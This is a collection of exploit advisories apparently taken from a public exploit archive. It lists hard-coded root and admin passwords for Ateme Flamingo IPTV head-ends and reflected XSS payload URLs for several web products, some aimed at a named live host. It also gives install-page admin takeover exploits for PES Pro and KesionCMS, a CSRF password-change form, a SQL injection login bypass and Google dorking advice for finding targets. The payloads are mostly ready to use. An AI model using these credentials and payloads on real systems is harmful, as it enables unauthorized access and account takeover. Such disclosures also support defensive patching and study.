<pre><code><br />Anevia Flamingo XL/XS 3.6.x Default/Hard-coded Credentials<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.6.20, 3.2.9<br /> Hardware revision 1.1, 1.0<br /> SoapLive 2.4.1, 2.0.3<br /> SoapSystem 1.3.1<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: The device uses a weak set of default and hard-coded administrative<br />credentials that can be easily guessed in remote password attacks and<br />gain full control of the system.<br /><br />Tested on: GNU/Linux 3.14.29 (x86_64)<br /> Apache/2.2.22 (Debian)<br /> PHP/5.6.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5777<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />SSH: root:anevia<br />SSH: enable:paris<br />WEB: admin:paris<br />WEB: monitor:anevia<br />OEM: monitor:anevia<br />OEM: monitor:teleste<br />OEM: monitor:envivio<br />OEM: monitor:blankom<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/32794/ - Pixobit Solutions │<br />│ Vendor : OmniCart - https://omnicartshop.com/ │<br />│ Software : OmniCart 3.4.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /<br /><br />GET parameter 'lang' is vulnerable to RXSS<br /><br />https://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1<br /><br /><br />Path: /index.php/search<br /><br />GET parameter 'search' is vulnerable to RXSS<br /><br />https://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/35390/ │<br />│ Vendor : wvidesk.com │<br />│ Software : LearnDesk 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /ebook-details<br /><br />GET parameter 'eBook' is vulnerable to RXSS<br /><br />https://website/ebook-details?eBook=2-20230526090815bgijo"><script>alert(1)</script>nq0d9<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/38745/ │<br />│ Vendor : webfuelcode │<br />│ Software : BB Machine Forum 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /thread<br /><br />POST parameter 'thread' is vulnerable to RXSS<br /><br /><br />[+] Exploiting the Bug<br /><br />1. From Index Page Click on Create Post<br />2. Fill any Subject<br />3. Select Any Category <br />4. in Thread "Put Your XSS Payload" example v4kow<script>alert(1)</script>ebxnq<br />5. Click on Submit<br />6. XSS Fired<br />7. Copy the link of your Post and send it to the Victim example: https://website/thread/Your-POST<br />8. XSS Fired on Victim Browser<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/36326/ │<br />│ Vendor : wvidesk.com │<br />│ Software : Expert X Jobs Portal And Resume Builder 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /companies<br /><br />GET parameter 'listed' is vulnerable to RXSS<br /><br />http://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvh<br /><br /><br />Path: /search-field<br /><br />GET parameter 'pos_ref' is vulnerable to RXSS<br /><br />http://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj <br /><br /><br />Path: /search-field<br /><br />GET parameter 'frmPositionCountry' is vulnerable to RXSS<br /><br />http://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>===========================================================================================<br />| # Title : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://photoswipe.com/ | <br />| # Dork : |<br />===========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : download?path=/uploads/images/support/download/index.php<br /><br />[+] Payload enables you to download empty files .<br /><br />[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PES Pro CMS - v1.9.7 Reinstall add admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://download1580.mediafire.com/3e3q3pr2g20g/jt6w98fdfyqk0s1/pes.zip | <br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : /install/?step=4 =====> http://127.0.0.1/zarabiarapl/install/?step=4<br /><br />[+] Set new user or password .<br /><br />[+] Admin panel : http://zarabiara.pl/admin-panel/index.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KesionCMS X9.5 Reinstall Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | <br />| # Vendor : https://www.kesion.com/ | <br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /install/index.asp<br /><br />[+] http://127.0.0.1/install/?action=s4 = add your information to login<br /><br />[+] copy & past this exploit listed below into a text file and save it with ".html" extension<br /><br />[+] Exploit :<br /><br />[+] @t Line 09 & 16 change the domain name of target<br /><br /> <head><title><br /> Hacked By indoushka<br /> </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /><br /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script><br /> </head><br /> <body> <br /> <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form"><br /> <div class="guide"><br /> <div class="guidetitle"><br /> </div><br /> <div class="clear"></div><br /> </div><br /> <div class="clear"></div><br /> <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5" /><br /> <input type="hidden" name="DBlx" value="" /><br /> <input type="hidden" name="CkbData" value="" /><br /> <br /> <input type="hidden" name="TxtDBName_a" value="" /><br /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /><br /> <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /><br /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /><br /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /><br /> <br /><div id="http://www.tzxdcpv.com/install/?action=s4"><br /> <br /> <br /><br /> </div><br /> <div class="clear"></div><br /> <div class="sjlist"><br /> <h5>网站参数配置</h5><br /> <ul><br /> <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li><br /> <li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 如http://www.kesion.com。<br /> </li><br /> <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 系统会自动获取,建议不要修改。<br /> </li><br /> <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"><br /> 免费版本用户请留空或填“0”。<br /> </li><br /> <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li><br /> <li><span> 后台登录验证码:</span><br /> <input type="radio" name="isCode_a" value="True" /> 启用 <br /> <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用<br /> </li><br /> <br /> <li><span>管理认证码:</span><br /> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 <br /> <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li><br /> </ul><br /> <div class="clear"></div><br /> <h5>填写管理员信息</h5><br /> <ul><br /> <li><span>管理员账号:</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li><br /> <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li><br /> <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li><br /> </ul><br /> <div class="clear blank10"></div><br /> <br /> <div style="padding:5px"><br /> <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"><br /> </div><br /> </div><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Pannres-idence CMS 7.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189 | <br />| # Dork : "Bylancer, All right reserved" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html Will modify the password for the site manager, as well as change the e-mail.<br /><br />[+] save code as poc.html .<br /><br /><br /><br /><form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2"><br /><br /> <fieldset><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="password" id="password" class="form-control" placeholder="Your new password." type="password"><br /> </div><br /> </div><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()"><br /><br /> </div><br /> </div><br /> <br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="newEmail" value="" class="form-control" type="email"><br /><br /> </div><br /> </div><br /> <br /> </fieldset><br /><br /> <div class=""><br /> <div class="row"><br /> <div class="col-md-12"><br /> <button class="btn btn-default" type="clear"><br /> Cancel<br /> </button><br /><br /> <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit"><br /> <i class="fa fa-save"></i><br /> Submit<br /> </button><br /> </div><br /> </div><br /> </div><br /><br /> </form><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />======================================================================================================================================= <br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Ormesson-immobilier cms v8 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.easysolutions.lu/ | <br />| # Dork : powered by Sogis.be © |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & Pass : 1' or 1=1 -- -<br /><br />[+] http://127.0.0.1/ormesson/MyGestion/#/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>